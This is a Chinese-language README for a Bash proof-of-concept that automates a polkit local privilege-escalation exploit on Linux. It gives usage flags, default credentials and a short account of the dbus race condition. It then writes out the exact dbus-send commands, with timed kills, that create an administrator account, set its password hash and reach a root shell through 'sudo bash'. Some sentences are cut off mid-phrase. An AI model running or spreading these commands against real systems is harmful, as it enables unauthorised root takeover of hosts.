这只是一个 Bash PoC 脚本,用于自动化 Kevin Backhouse 博客中提到的利用步骤。 阅读他关于此漏洞的博文:https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
使用方法:
./poc.sh
-h --help
-u=输入自定义用户名(可选)
-p=输入自定义密码(可选)
-f=y,跳过漏洞检查并强制利用(可选)
-t=输入自定义睡眠时间,而不是自动检测(可选)
时间格式示例:'-t=.004' 或 '-t=0.004',表示将睡眠时间设置为 0.004ms
注意:
指定选项时必须使用等号(=)。
如果不指定选项,脚本将自动检测可能的时间,并尝试使用该时间插入新用户。
默认凭据是 'secnigma:secnigmaftw'
如果利用成功,则可以使用 'su - secnigma' 登录,并使用 'sudo bash' 生成 root shell。
accountsservice 和 gnome-control-center 的发行版,并且必须具有 polkit 版本 0.113(或更高)或 0-105-26(Debian 分支的 polkit)。Ubuntu 20.04(polkit 版本 0-105-26,Debian 分支)和 Centos 8(polkit 版本 0.115)上测试通过。如果确定目标存在漏洞,但利用的检查功能失败,可以使用 -f=y 标志绕过所有检查并强制利用。su - <username> 并配合脚本提供的密码登录账号,然后输入 sudo bash 进入 root shell!Esc 键关闭身份验证提示,然后按 Ctrl+C 快速终止脚本。研究者的博客中提供了详细的解释和手动利用的 PoC。
以下是此利用的 TL;DR 简介:
dbus 消息触发 polkit,但在 polkit 处理请求时突然中断连接。然后,攻击者可以使用先前请求的唯一总线标识符发送第二个请求,以 UID 0(即 root)的身份执行请求。polkit 中,因为它会将不再存在的总线标识符的连接 UID 视为来自 UID 0 的请求。这意味着,如果我们能正确把握攻击时机并在恰当时刻终止第一个请求,就可以使用 UID 0(即 root)的权限发出第二个请求。正如之前所说,这只是一个自动化 Kevin Backhouse PoC 的 bash 脚本。核心命令相同;我只是自动化了一些初始步骤(例如确定正确的时间、扫描漏洞、插入自定义凭据、打印彩色输出等)。
如果在没有任何参数的情况下运行此脚本,其默认行为如下:
/etc/os-release 文件。]accountservice 和 gnome-control-center 的安装情况。[在 rhel/centos/fedora 中,使用 rpm -qa;在 debian/ubuntu 发行版中,使用 dpkg -l。]rhel/centos/fedora 要求 0.113(或更高),Debian/Ubuntu 要求 0-105-26。]bash time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:`echo $username` string:"`echo $username`" int32:1 2>&1 >/dev/null $t)。($t=time-required-to-request/2)[使用 awk 计算]$t)后,重复执行 20 次插入 $username(secnigma)的请求。bash dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:`echo $username` string:"`echo $username`" int32:1 & sleep `echo $t`s ; kill $! id secnigma 确认],则生成密码哈希 [使用 bash openssl passwd -5 `echo -n $password` ]。($password=secnigmaftw)bash dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User`echo $u_id` org.freedesktop.Accounts.User.SetPassword string:`echo -n $hash1` string:GoldenEye & sleep `echo $ti`s ; kill $!